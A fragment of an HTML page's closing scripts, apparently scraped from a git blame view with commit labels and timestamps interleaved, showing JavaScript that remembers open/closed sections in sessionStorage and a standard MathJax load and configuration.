2022-09-09 15:41:05 +02:00
//console.log('open');
init
2022-09-02 09:05:59 +02:00
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
Added settings.toml
2022-09-09 15:41:05 +02:00
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
init
2022-09-02 09:05:59 +02:00
} else {
Added settings.toml
2022-09-09 15:41:05 +02:00
//console.log('closed');
sessionStorage.removeItem(obj.id);
}
}
init
2022-09-02 09:05:59 +02:00
Added settings.toml
2022-09-09 15:41:05 +02:00
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
init
2022-09-02 09:05:59 +02:00
</script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
init
2022-09-02 09:05:59 +02:00
<script type="text/x-mathjax-config">
Added settings.toml
2022-09-09 15:41:05 +02:00
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
init
2022-09-02 09:05:59 +02:00
</body>
</html>